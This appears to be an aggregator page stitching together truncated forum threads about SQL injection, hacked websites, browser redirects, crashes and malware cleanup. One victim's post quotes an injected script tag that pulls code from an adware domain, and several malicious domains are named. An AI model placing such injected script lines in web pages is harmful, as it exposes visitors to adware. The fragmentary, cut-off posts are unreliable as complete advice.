Tech Problem Aggregator

visiting Compromised websites -SQL Injection ATTACKS

Q: visiting Compromised websites -SQL Injection ATTACKS

Is it safe to visit a website that has been attacked with SQL injection? As an example, google www.wowyeye.cn www.killwow1.cn and look at the websites that have been compromised by these Chinese domains. If by chance you surf to a site "taken over", can that website with the attack host files be downloaded to your browser?

A: visiting Compromised websites -SQL Injection ATTACKS

Answer Match 98.28%

Quote:
Security researchers warn that websites hosted at Go Daddy are currently targeted in mass injection attacks, that add rogue code to their pages and direct visitors to scareware.
...


Websites Hosted at Go Daddy Under Siege in Mass Injection Attacks - Softpedia

A:Websites Hosted at Go Daddy Under Siege in Mass Injection Attacks

Thanks for the heads up. My company's website is hosted through GoDaddy, so I'll keep an eye on my code.

Answer Match 81.9%

I'm pretty sure I've been hit with something, but I'm not sure how to trace it down.

I need to try to identify what it is so I can make sure I know what they were looking for.

Here's one of the only screenshots I've been able to grab of the offending software.

http://imgur.com/a/WMJVL

It appears to customize what is displayed based upon GeoIP.

Where do I begin? I haven't done malware removal in depth since XP SP2.

Thanks,

Booty
 
 

Answer Match 76.86%

My server encountered SQL Injection Attacks. Please, somebody, recommend an intrusion detection tool. Thanks in advance!

A:How to Detect SQL Injection Attacks

Using Database Caches to Detect SQL injection - To Cache a Thief
How to detect and stop SQL injection attacks
SQL Inject-Me to test for SQL Injection vulnerabilities - SQL Inject-Me FAQs
Finding SQL Injection with HP Scrawlr
Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities...
Download HP Scrawlr
Free Edition of Acunetix Web Vulnerability Scanner
Online Tools: SQL Injection Vulnerability Test

Edit: Fixed link

Answer Match 76.02%

Steve Friedl, Microsoft MVP, developed an awesome and highly detailed article on how SQL Injection attacks work. DBAs and System Administrators need to be on the latest and greatest SPs and security updates for SQL-Server and other RDBMS's.

Excellent Article: SQL Injection Attacks by Example
http://www.unixwiz.net/techtips/sql-injection.html

SQL Injection is caused by unverified/unsanitized user input, and its main idea is to convince the application to run SQL code that it was not intended to run. If the application is creating SQL strings natively, i.e. on the fly, and then running them, it's straightforward to create some real surprises. There have been other papers on SQL injection, including some that are much more detailed, but this one shows the rationale of discovery as much as the process of exploitation.

Answer Match 66.36%

  
Quote: Originally Posted by Casuaisxtynine


Really really random bsod's. help please! :<


This is a repost.. I'm sorry for this but I need help

A:BSOD - Visiting websites

Hi Casuaisxtynine.

Click on the button below ....



It will download the DM log collector. Right click on the application and run as administrator. It will generate a .zip file on your desktop. Upload the .zip.
Screenshots and Files - Upload and Post in Seven Forums

Answer Match 66.36%

Really really random bsod's. help please! :<

A:BSOD - Visiting websites.

Code:
BugCheck 116, {fffffa80046bb010, fffff88003bb045c, 0, 2}
This bugcheck indicates that an attempt to reset the display within the allocated time interval failed, hence the bugcheck.
This isn't a typical bugcheck in terms that this only happens when the graphics card doesn't respond either because of a bad driver or the GPU is faulty.


Code:
2: kd> KnL
# Child-SP RetAddr Call Site
00 fffff880`05a7a1c8 fffff880`0414b054 nt!KeBugCheckEx <-- The BSOD crash
01 fffff880`05a7a1d0 fffff880`0414ad5e dxgkrnl!TdrBugcheckOnTimeout+0xec <-- Instruction telling the system to crash if the graphics card doesn't respond.
02 fffff880`05a7a210 fffff880`0400ff13 dxgkrnl!TdrIsRecoveryRequired+0x1a2 <-- Telling the system to run a display recovery.
03 fffff880`05a7a240 fffff880`0403ded6 dxgmms1!VidSchiReportHwHang+0x40b <-- This reports the graphics card has hung.
04 fffff880`05a7a320 fffff880`04023ce9 dxgmms1!VidSchWaitForCompletionEvent+0x196
05 fffff880`05a7a360 fffff880`04026be7 dxgmms1!VIDMM_GLOBAL::xWaitForAllEngines+0x1e9
06 fffff880`05a7a460 fffff880`040252d8 dxgmms1!VIDMM_GLOBAL::SetupForBuildPagingBuffer+0xd7
07 fffff880`05a7a4a0 fffff880`0402522e dxgmms1!VIDMM_GLOBAL::UnmapVideoApertureSegmentInternal+0x34
08 fffff880`05a7a630 fffff880`0402e77e dxgmms1!VIDMM_GLOBAL::UnmapVideoApertureSegment+0x13e
09 fffff880`05a7a6a0 fffff880`0402e527 dxgmms1!VIDMM_APERTURE_SEGMENT::UnmapApertureRange+0x7a
0a fffff880`05a7a6f0 ff...

Answer Match 66.36%

Hello all,
I am having a problem with all of the browsers on my computer directing to a spam search site when I try to visit certain websites.

I believe the problem started when I installed this software to help me switch audio output very easily:
http://www.sevenforums.com/customization/65079-anyway-use-hotkeys-switch-sound-output.html

I've done the following:
1) Run updated Malware bytes Anti Malware
2) Run TDSS Rootkit Remover Tool by Kaspersky.
3) Run Virus Remover Tool by Kaspersky.
4) Reset my cookies in Chrome.
5) Read the "Before posting a log" on this forum (the sticky post).
6) Updated my notification options as recommended.
I could not run GMER as I'm running Windows 7 64 bit.

I've attached my DDS/Attach/Hijack logs.

A:Redirecting When Visiting Websites

Hi,

You mentioned running a number of tools in the beginning, did they all come back clean? I'd be in particular interested in the tdsskiller log.

regards myrti

Answer Match 65.94%

I have a:
Gateway laptop Gateway Laptop
MX6433
AMD Turion 64 mobile
Technology ML-30
1.59 GHz, 448 MB of RAM
Windows XP Media Center edition (service pack 3).

I bought it two years or so ago. Since as long as I can remember I have had this problem.

When I am on my browser (I use chrome, firefox, and IE) my wireless connection will cut out after a while. I have noticed that if I am on just one site (example: Pandora.com) it can be fine for hours. But once I start going to different sites, I eventually get kicked off. It can be any website, Facebook, youtube, etc.

When I lose connectivity, I refresh my wireless connections and only the printer comes up. If I try to right click on the tray icon to repair internet connection, it freezes. I am guessing that this is a hardware problem. (?) Though I'm not extremely technical with computers, I know my way around most issues that can arise.

I have reformatted my hard drive (twice) and all my software is up to date. I have run AVG scan and Ad Aware scan hundreds of times. Can anyone offer assistance? Thank you very much!
 

Answer Match 65.94%

I am rephrasing the question to be more specific. I cannot see how my first request was inappropriate. I have not needed to set up a network in years, so I hope someone has the answer to my question.

I am paying for my home internet, and I do not want anyone visiting pron websites. Is there any tool that can alert me if one of my friends is accessing inappropriate material on the website? Someone closed my question before, so I guess knowing how to share their internet histories is NOT the proper answer.

I will not stand for people looking at bad websites, so I hope someone can point me to a decent solution.
 

A:I need to make sure users are not visiting bad websites

Answer Match 65.94%

We recently added a filter to our computer because of our children. Each week we get a report on sites that we attempted to be opened, but are blocked. There are several, but one in particular is on there all the time and has a high percentage. I am wondering if anyone recognizes it and if it is possible that somehow there is something on our computer that is automatically leading us there. We have not gone to it ever as far as I know.

It is: eserviceds1x.us.dell.com

We have both AdAware SE and Spybots and run them regularly.

Below is our Hi-Jack this latest run:

A:Websites visited that we aren't visiting??

Hi MNgirl,

1 Download LSPFix from http://www.cexx.org/lspfix.htm .

2 Create a permanent folder like C:\Program Files\LSP and extract the download zip file into that folder.

3 Log your computer in safe mode (hit F8 many times during booting procedure);

4 Disable your System Restore : have a look to Disabling or enabling Windows XP System Restore ;

5 Close all open windows - it is very important;

6 Run LSPFix : click only the Fix button;

7 Reboot normally and post a new HijackThis log.
 

Answer Match 65.1%

I've been able to run a few scanners, Avast!, Spybot S&D, AVG, etc- spybot found a few things, and deleted them. The online webscanners like panda and trend micro won't allow me to goto the sites, because whatever the virus is takes me to another site/weberror even if I type it straight into the adress bar. I ran stinger and it found no errors, following is my hijackthis logfile.

A:Doesn't Allow Visiting Of Anti-spyware Websites

Hello Shoyu,

Welcome to Bleeping Computer

Sorry about the delay. If you still need help, please post a new HijackThis log to make sure nothing has changed, and I'll be happy to look at it for you.

Thanks,
tea

Answer Match 65.1%

Hey guys,

I have a friend who has an adult filtering program on his computer. I get a daily email with all of the sites his computer goes to. I know that they are not visiting these sites personally, so, there has to be some malware/adware that is causing it. I also learned today that there are a number of popups, probably related to these sites.

The websites are:

msn.com yahoo.com, foxsports.com, youtube.com, yimg.com, microsoft.com, facebook.com, gamevance.com, conduitservices.com
Also - it has been running slower as of late.

Thanks for the help.

Jeremy

A:Vista Laptop - visiting certain websites automatically every day

I hate to use the word "Bump," but, I just wanted to send out a reminder....

Answer Match 64.26%

OS = Windows 10, affects all browsers used (slimbrowser, slimjet, IE11, Firefox w/noscript running, Chrome, Opera, these are the only ones I tried)

When browsing to a website (typically seems to be stream2watch) but others randomly trigger a message that informs me to call my ISP to remove malware, and a fake blue screen error within a browser window behind that. This can only be terminated by ending the task within task manager. ALT+F4 does nothing, just sends it repeating.
 
I have Secure A Plus running along with Superantispyware, both have run a full scan and to no avail minus piddly tracking cookies in SAS. ADW cleaner also has been run after the fact. No repeat customer seem to appear.
 
I have a screen capture if you would like to see it, and hope to get this resolved, it gets very irritating. Thank you
 
 

A:Possible malware informs me to contact ISP when Visiting websites to remove it

Download Security Check from here or here and save it to your Desktop.
Double-click SecurityCheck.exe
Follow the onscreen instructions inside of the black box.
A Notepad document should open automatically called checkup.txt; please post the contents of that document.
NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access the Internet, allow it to do so.
NOTE 2. SecurityCheck may produce some false warning(s), so leave the results reading to me.
NOTE 3. If you receive UNSUPPORTED OPERATING SYSTEM! ABORTED! message restart computer and Security Check should run

Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.
Make sure the following options are checked:
Internet Services
Windows Firewall
System Restore
Security Center/Action Center
Windows Update
Windows Defender
Other Services
Press "Scan".
It will create a log (FSS.txt) in the same directory the tool is run.
Please copy and paste the log to your reply.

Please download MiniToolBox and run it.
Checkmark following boxes:
Report IE Proxy Settings
Report FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries
List last 10 Event Viewer log
List Installed Programs
List Devices (do NOT change any settings here)
List Users, Partitions and Memory size
List Restore Points
Click Go and post the result.

Please download Malwarebytes Anti-Malware (MBAM) to your desktop.
NOTE. If you already have MBAM 2.0 installed scroll down.
Double-click ...

Answer Match 64.26%

Upon visiting websites, a pop up comes up (screenshot available upon request) informing me to contact my ISP (which is the correct one) and a phone number to call. Some annoying voice also speaks this and can only be terminated via the task manager. Everything that has been done so far is outlined in previous correspondence here: http://www.bleepingcomputer.com/forums/t/590600/possible-malware-informs-me-to-contact-isp-when-visiting-websites-to-remove-it/
 
All browsers are affected and seems to be triggered mostly by stream2watch.com but is not limited to there as I get the message randomly on other sites (ESPN, CNN, Bleeping computer included)
 

A:Possible malware informs me to contact ISP when Visiting websites to remove it

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.
If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===
Press the windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.
Please copy the entire contents of the code box below to a new file.

start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

(@ByELDI) C:\Program Files\KMSpico\Service_KMS.exe
(Ammyy LLC) C:\Users\justin\Downloads\AA_v3.exe
HKLM\...\Policies\Explorer\Run: [Mpk.exe] => C:\Program Files (x86)\KGB\Mpk.exe
GroupPolicyScripts: Restriction <======= ATTENTION
GroupPolicyScripts\User: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
CHR HKU\S-1-5-21-1106552174-2026213447-2673983111-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1106552174-2026213447-2673983111-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
OPR Extension: (No Name) - C:\Users\justin\AppData\Roaming\Opera Software\Opera Stable\Extensions\mhgklikgljbhnomlmhmondmafldgmojo [2015-08-31]
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe &...

Answer Match 64.26%

As the title states, after visiting some potentially dangerous websites, my laptop is acting a little strange. I'm concerned that a trojan virus or the like may be capturing my data/passwords. I would greatly appreciate any assistance! Below is my generated  FRST.txt log:
 

A:Suspicious behaviour on laptop after visiting questionable websites

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.
If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===
Remove this program via the Control Panel > Programs > Programs and Features applet.
Driver Downloader v3.2 (HKLM-x32\...\Driver Downloader_is1) (Version: 3.2 - PDE Publications Limited)
===
Press the windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.
Please copy the entire contents of the code box below to a new file.

start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

(PDE Publications Limited) C:\Program Files (x86)\Driver Downloader\DDTray.exe
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKU\S-1-5-21-1473783762-3503634554-1593080487-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSK => not found
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2013-06-02] <==== ATTENTION
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\50.0.2661.102\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\50...

Answer Match 61.32%

Hi guys, I'm new to this forum; But I recently encountered a problem while injecting a .dll into a program. The error message is what the title says and I tried a lot of injectors and it returned the same error.

Here's what I tried:
Upgraded windows 8.1 to 10
Unblocked the DLL
Different injection methods

None of these worked, help would be appreciated.
Thanks

A:[DLL] Injection Method used returned NULL (Injection failed).

Bump.

Answer Match 60.48%

Hi,

Sorry for delayed response. Forums have been really busy. If you still need help with this post a fresh dds log, please.

A:Infected with DOS That Attacks certain websites (?)

Due to inactivity, this thread will now be closed. If you need this topic reopened, please contact a Staff member. Include the address of this thread in your request. This applies only to the original topic starter. Should you have a new issue, please start a New Topic.

Answer Match 59.22%

Norton keeps telling me it's blocking attacks from these websites:67b6b6b6.comIK01ha711g1.cczl091kha644.com91jjak4555j.com195.206.246.21634jh7alm94.asiaI've run full scans with Malware Bytes and Norton security suite. Malware bytes detected 10 infected objects and removed them, but the attacks still continued.

A:Norton is constantly blocking attacks from various websites

Hello and Welcome to the forums!
My name is Gringo and I'll be glad to help you with your computer problems.

Some things to remember while we are working together.
Do not run any other tool until instructed to do so!
Please Do not Attach logs or put in code boxes.
Tell me about any problems that have occurred during the fix.
Tell me of any other symptoms you may be having as these can help also.
Do not run anything while running a fix.

In the upper right hand corner of the topic you will see a button called Options. If you click on this in the drop-down menu you can choose Track this topic. By doing this and then choosing Immediate E-Mail notification and then clicking on Proceed you will be advised when we respond to your topic and facilitate the cleaning of your machine.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

In order for me to see the status of the infection I will need a new set of logs to start with.
Please print out or make a copy in Notepad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.

DeFogger: Please download DeFogger to your desktop.
Double click DeFogger to run the tool.
The ap...

Answer Match 59.22%

Hi all, my computer at work is extremely slow and is bombarded by attacks from what Malwarebytes calls possibly malicious websites.


A:Constant attacks from possibly malicious websites

Hi,
Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.

Please subscribe to this topic, if you haven't already. Click the Watch This Topic button at the top on the right.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there.

The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.

Once I receive a reply then I will return with your first instructions.

Thanks

Answer Match 58.8%

Sometime over the weekend, something must have gotten into my computer that Avast, ESET, Malwarebytes and SuperAntiSpyware are not finding. I believe it was on my laptop, but I think at this point both my laptop and desktop (and possibly an external drive that I use on both PCs) could be compromised.

It started with my attempt to login to an e-commerce store that I have been working on for a friend. The login page had a bunch of random code at the top of the site that was never there before. When I did login, it would randomly boot me out to the login page again when trying to add products to the store or images to products. The code on there right now at the top of the page is:

Warning: session_start() [function.session-start]: open(/services/webdata/php_sessions/sess_f2fead3b2577d2cef3eb580d02adcd14, O_RDWR) failed: No such file or directory (2) in /services/webpages/util/2/z/2zc3i26jm.myutilitydomain.com/blackenedmoon.com/public/store/system/library/session.php on line 10
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /services/webpages/util/2/z/2zc3i26jm.myutilitydomain.com/blackenedmoon.com/public/store/admin/index.php:72) in /services/webpages/util/2/z/2zc3i26jm.myutilitydomain.com/blackenedmoon.com/public/store/system/library/session.php on line 10

So I had a friend who is more well-versed in OpenCart checking into it and she couldn't figure anything besides perhaps a folder that stor...

A:My FTP Store Login Info Compromised; Websites Hacked

Hello and welcome to Bleeping Computer!
I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************
In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/414751 <<< CLICK THIS LINK

If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************
If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the low...

Answer Match 49.98%

Esteemed Forum Members,

This is my first posting here. I am a Java programmer/developer. And I look forward to participating. Although I generally find that I learn more from reading the posts of the knowledgeable folks here than with me talking.

My current question is to see if anyone knows any more about a computer affliction that has affected two friends in the past week. (They are in different groups, so these are separate "afflictions".)

The two are remarkably similar so I am hypothesizing that they are basically the same attack. I suspect that if I have bumped into two of these cases, you folks may have already been there and done that.

As I don't have access to either of their computers, and as they are rather naive MSWindows users, it might be difficult for me to run the various diagnostic tools on their systems.

Basically the symptom is that they received an email from a known source. (Yeah, I know...) And clicked on a link to one of the {canxhealth health24x medhealthx xmedx } dotcom websites. The result is that, at a minimum, their Yahoo email account was compromised and an email was sent out to all of their contacts. The sent email has no subject and contains only the link to the malware website.

Googling through the web, I see suggestions ranging from changing the email account password through reformatting the hard-drive and resetting external routers. I also see claims that none of the major anti-virus/firewall applications detect this... Read more

A:Yahoo Account Compromised, possible system compromised

Hello Chuck, First I will move you one forum down to Am I Hacked. Please read the first pinned topic there, Who To Contact If Your Yahoo Webmail Account Is Hacked. Next follow these instructions, also a pinned topic there: How to receive help in the Am I Hacked? forum

5 more replies
Answer Match 49.98%

Hello.  I seem to be sharing my firewall privileges with a remote hacker and a system restore didn't help.  A similar posting at Tom's Hardware pointed to a corrupted/malware rundll32.exe file creating extraneous malware files (guard.tmp, filename.dll) in his Win/System32 folder.  I suspect I have something similar though couldn't find those same file names.  (His posting is here: http://www.tomshardware.com/forum/134388-45-mysterious-rundll32-administrator-privileges )
 
I have tried kaspersky, combofix, rskiller, hitman, symantec, emsisoft, avg, symantec, windows defender, etc.  I am not a tech guy by trade but serve as my own IT guy some months so any help I get is welcome.  I probably am supposed to be posting "hijack this" findings or something as a first step but haven't done anything like that in 12 years so I figured I would post my problem first.  Thank you.

More replies
Answer Match 49.56%

The GozNym banking malware is coming to America with a fresh tactic.

Hackers combined code from two malware types, known as Nymaim and Gozi, to create the unholy hybrid dubbed GozNym, a franken-trojan, if you will. It was first spotted in April, and has since evolved: Its operators are testing redirection attacks on four of the largest banks in the United States and targeting their business accounts, according to IBM X-Force. Redirection attacks are most typically used with organized cybercrime that have the resources necessary to implement them.

The overall idea behind redirection attacks is to hijack malware-infected users, sending them to a website that looks exactly like their bank's site. They then log into their "account," and their credentials are stolen on the fake site in real time, tested against the bank's genuine home page and used to initiate a fraudulent money transfer out of the account.

"Moreover, the victim is kept on the fake website, where the attacker can push social engineering notifications to them, making them divulge personally identifiable information (PII) and two-factor authentication elements," IBM researchers explained.

The firm added that the team behind GozNym has built its own special scheme designed to keep the attacks hidden from prying security researchers' eyes.

"To prepare a successful redirection attack, GozNym has a two-stage process in place," IBM researchers said. "At first, the malware redirects the victim to... Read more

More replies
Answer Match 44.94%

Hey, I believe I have malware on my computer, my friend told me about this site and told me to use combofix, I did. It told me that I had a few rootkits, it said to take care of them I had to reboot, then it did it again, I had to do that a total of 2 or 3 times, the last time it told me windows wasn't genuine, I just Xed out of it because it is genuine. I have the log, it told me it deleted the problems, but yet I'm still experiencing them. Whenever I search anything, not just on google, on bing, yahoo!, ask, alta vista, dog pile, any search engine, almost always norton pops up saying it blocked an attack. I've been making my own personal log of things happening to my computer, I have attached it here just in case you might need more info on what's going on with my computer. And as I type this an attack was attempted by 1iii1i11i1ii.com resulted from svchost.exe, ones that are resulted from that appear to be random, also it keeps trying to turn off User Account Controls, yesterday it was notifying me, today it is not, but I think combofix has deleted the rootkits causing that. I have also used malwarebytes. It found a malware packer and a keylogger. To make matters worse, Windows won't update.

DDS (Ver_10-03-17.01) - NTFSx86
Run by Paul at 15:15:42.71 on Mon 06/21/2010
Internet Explorer: 8.0.7600.16385
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1033.18.3033.1725 [GMT -4:00]
============== Running Processes ===============
C:\Windows\system3... Read more

A:Search related attacks, redirects, and attacks related from svchost

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems.

Some things to remember while we are working together.
Do not run any other tool until instructed to do so!
Do not Attach logs unless I ask you to.
Tell me about any problems that have occurred during the fix.
Tell me of any other symptoms you may be having as these can help also.
Do not run anything while running a fix.
Do not run any other tool until instructed to do so!

In the upper right hand corner of the topic you will see a button called Options. If you click on this in the drop-down menu you can choose Track this topic. By doing this and then choosing Immediate E-Mail notification and then clicking on Proceed you will be advised when we respond to your topic and facilitate the cleaning of your machine.

Note** If you are having problems posting the complete log into this thread upload them here http://www.rapidshare.com/ and post the links in this thread.

Please print out or make a copy in Notepad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.

I would like you to run these programs again and send me these new logs and let me know how things are doing.

DeFogger: Please download DeFogger to your desktop.
Double click DeFogger to run the tool.
The application window will appear
Click the Disable button to disable your CD Emulation drivers
Click Yes to continue
A 'Finished!' message will appear ... Read more

7 more replies
Answer Match 42.84%

Please can someone help me, I have no idea what that is.....
''Runtime Error (at-1:0)
Cannot import dll:C:\documents\user\Locale...\Temp\.....\Injectior .dll''

This appears when I try to install a program.... pls help

More replies
Answer Match 42.42%

This is a new, Lenovo G50 with windows 8. The owner whom I am working on their behalf downloaded a bogus flash player update that came with everybody's favorite add on programs. Programs like OptimizerPro and that helpful guy with the headset that tells you to call to get rid of him. Anyway, I decided to perform a system restore. After which I ran scans with JRT, ADW, Malwarebytes, spybot, then I looked through startup options with Autoruns and all seemed well, until, he tried to log into his webmail. Some script error appears on screen, the error itself is not so much an error as just a bunch of code that tells me nothing. I used f-12 developer tools in Chrome and IE and found that one thing seems to stick out. First I'll post the main error below.
', f ? f(document) : '') function color(s) { document.bgColor = s } function hint(s) { top.window.status = (s ? s : '') return true } var doc = document var form = document.form var form1 = document.form1 var form2 = document.form2 var errno = 0 if (arg.length > 6 && arg.substring(0, 7) == 'bgcolor') color(arg.substring(8, arg.length)) f = eval('parent.' + selfname + 'Init') if (f) f()
 

This really tells me nothing. So with the f-12 tools I found this in the code under mbox.msc...

if (parent.mboxCB) parent.mboxCB()
</script>
<script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script></head>
</html>

I'm sure this is the problem. I searched the ... Read more

A:.js injection wont go away!

DDS won't run. Says it won't run in compatibility mode, perhaps it doesn't work in 8?

28 more replies
Answer Match 42.42%

So as of late I've been getting these pop ups. In most cases I would think "alright run some adware/malware scans and check for updates to the pop up blocker". However this one has me stumped. The pop ups are coming through the steam browser. Which I don't know how to fix. I ran malwarebytes, super antispyware, comodo, and spybot, alas no luck. Tried reinstalling steam as a last ditch effort but again no luck. I attached a picture of the pop up, roughly 90% are about a video player update, ranging from a generic "your video player is out of date" like the photo to ones who mimic flash. There are others but malware bytes blocks the page from loading some of them.

A:possible java injection

A moderator may now close this thread. I seem to have fixed the issue. It was an issue with my router being compromised not my computer.

2 more replies
Answer Match 42.42%

This is a new, Lenovo G50 with windows 8. The owner whom I am working on their behalf downloaded a bogus flash player update that came with everybody's favorite add on programs. Programs like OptimizerPro and that helpful guy with the headset that tells you to call to get rid of him. Anyway, I decided to perform a system restore. After which I ran scans with JRT, ADW, Malwarebytes, spybot, then I looked through startup options with Autoruns and all seemed well, until, he tried to log into his webmail. Some script error appears on screen, the error itself is not so much an error as just a bunch of code that tells me nothing. I used f-12 developer tools in Chrome and IE and found that one thing seems to stick out. First I'll post the main error below.
 
', f ? f(document) : '') function color(s) { document.bgColor = s } function hint(s) { top.window.status = (s ? s : '') return true } var doc = document var form = document.form var form1 = document.form1 var form2 = document.form2 var errno = 0 if (arg.length > 6 && arg.substring(0, 7) == 'bgcolor') color(arg.substring(8, arg.length)) f = eval('parent.' + selfname + 'Init') if (f) f()
 

 
This really tells me nothing. So with the f-12 tools I found this in the code under mbox.msc...
 
if (parent.mboxCB) parent.mboxCB()
</script>
<script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script></head>
</html>
 

I'm sure this is... Read more

A:.js injection wont go away!

Thanks for the move, wasn't sure what to put this under.

4 more replies
Answer Match 42.42%

Hi all,

I'd appreciate your help with some problems I have been facing.

I recently changed webhosts and updated my wordpress site: guitarbench.com

Soon after the move, I received emails that the site was flagged by AVAST. Removal of some IP to world map trackers solved that issue.

Then I noticed a lot of issues with the visual editor and reinstalled wordpress automatically as per wordpress.org faq advice. Soon after, I was getting a blank page on my dashboard. Looking through the process, Dashboard would fine but then try to reload to a blank page. I noticed that page was trying to load to www.foreigntechnolonies.com. A look through the page source and I found this: "http://foreigntechnologies.com/ivanyuk/JU3Zgt3HDr.php" which I didn't recognise.

Then a look through my folders showed: gifimg.php which looks like a PHP Script Injection Exploit.

I deleted the gifimg.php files- but no difference so I deleted all the .js files with the write:script in- also no difference. Then I disabled all the plugins- and it solved the problem. I narrowed it down to the add everything plugin which I then deleted. That seemed to solve the problem. So far so good, but then after adding back the .js files I deleted, all the time checking to see if the site worked ok. When I got to the end, the site came down with the same problem, again. So I repeated the same process: except there are no gifimg.php files left and now it doesn't solve the problem and the "http://... Read more

More replies
Answer Match 42.42%

Today I was installing my new printer and I have comodo firewall. When I was in the middle of the process, comodo came up and told me something about a shellcode injection. I clicked terminate. What was happening to my computer?

A:shellcode injection?

oh yeah and it said something like this "Possible buffer overflow attack"

2 more replies
Answer Match 42.42%

Asus EEE Celeron M 900 1G
Windows XP Home Ed. 2002 SP2
Comodo Firewall, Avira AntiVir
Firefox 3.0.3

I downloaded a real player install from a very well known site in the uk to get live sports radio online... During installation, Comodo firewall continuously gave me warnings that realplay.exe was trying to control a bunch of my processes and tried to access memory. I have read about real player being badware so I allowed the firewall to continue assuming that it was 'normal'.. Since I only needed the player for a few hours I uninstalled it. 1 day later, while browsing, Firefox stopped reacting to the mouse and opened a few unrelated new windows. PC didn't react for about 10sec until Comodo gave me a shellcode injection warning from AcroRd32 .exe - that I blocked - thus isolating AcroRd32.exe. There were no adobe progs running or pdf links clicked at the time. I remember some real player trying to control AcroRd32.exe during install so I imagine it might be related.
Please help me on this 1, I usually reinstall the whole PC when there's a problem but I'm not sure if that's necessary now.

Thank you!

More replies
Answer Match 42.42%

Check this one out, I read an article on how this was done the other day (how they are trying to use domain names that appear to be genuine) and lo and behold we got an email.
Check the java script as well and see how they use that to inject. If I find the article I will post here.
http://urlquery.net/report.php?id=1476922199803
What i found interesting was this

if (window.location.hostname.split('.').pop().search(/edu|gov|mil/) < 0) {

More replies
Answer Match 42.42%

Say if I have a program in windows and I have no access to its source code, I want to redirect the data send to it to my custom program first. Anyone willing to share how is it done? Or is it possible?
 

A:DLL Hooks API injection

6 more replies
Answer Match 42.42%

I was talking on MSN 8.0 and all of a sudden....some random person whose email I didn't get said hi and my msn(just msn) totally froze and wouldn't close. I opened my task manager and my cpu was at a firm 100% and wouldn't go down, but as soon as I ended the process through TM it went back to 4%....I believe I'm getting either MSN Injected or DDoS'ed. I've scanned my computer with basically every scanner known to man and it picks up nothing...I've closed a few un-needed ports and deleted a few un-needed exceptions on my firewall and I think it's stopped but I want to be 100% sure....like my cpu lol. If anyone could verify what the problem is or if it's DDoS or Injections that'd be great.
Thank you,
Nick

A:Injection Or Ddos

~bUmP~

1 more replies
Answer Match 42.42%

I want to script an online game with WPE PRO, but every time I select the TARGET PROGRAM (IEXPLORER) it says: DLL INJECTION FAILED
anyone can help with it?
 

More replies
Answer Match 42.42%

Hey just read this.
"
Epic exploited two holes in windows 7 to gain access via a ghost remote injection and crash allowing complete control of the kennel will be releasing the two zero days in a few weeks once I've had my fun."
Think it is possible.

A:Ghost Injection

Link?

9 more replies
Answer Match 42.42%

